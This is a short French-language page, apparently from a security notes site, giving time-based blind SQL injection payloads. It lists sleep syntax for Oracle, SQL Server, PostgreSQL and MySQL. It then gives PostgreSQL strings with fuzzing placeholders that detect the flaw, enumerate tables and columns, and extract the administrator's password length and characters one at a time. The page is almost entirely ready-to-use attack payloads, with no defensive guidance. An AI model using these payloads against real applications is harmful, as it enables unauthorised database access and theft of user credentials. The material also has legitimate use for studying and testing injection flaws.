⏳Time based
Synthaxe
Oracle
dbms_pipe.receive_message(('a'),10)
Microsoft
WAITFOR DELAY '0:0:10'
PostgreSQL
SELECT pg_sleep(10)
MySQL
SELECT SLEEP(10)
Exemple d'exploitation sur PostgreSQL
Détection
'||pg_sleep(3)||'
'XOR(if(now()=sysdate(),sleep(10),0))OR'
if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
Enumeration des tables
'||(SELECT pg_sleep(3) FROM <FUZZ> LIMIT 1)||'
délais de 3 sec pour table users
Enumeration des colonnes
'||(SELECT pg_sleep(3)||<FUZZ> FROM users LIMIT 1)||'
délai de 3 secondes pour colonnes username et password
Recherche utilisateur administrator
'||(SELECT pg_sleep(3)||username||password FROM users WHERE username='administrator')||'


Déterminer le nombre de caractères dans le mot de passe
'||(SELECT pg_sleep(3) FROM users WHERE username='administrator' AND LENGTH(password)=<FUZZ>)||'
Bruteforce du mot de passe
'||(SELECT pg_sleep(3) FROM users WHERE username='administrator' AND SUBSTR(password,<LENGTH_FUZZ>,1)='<LETTER_FUZZ>')||'

Dernière mise à jour
Cet article vous a-t-il été utile ?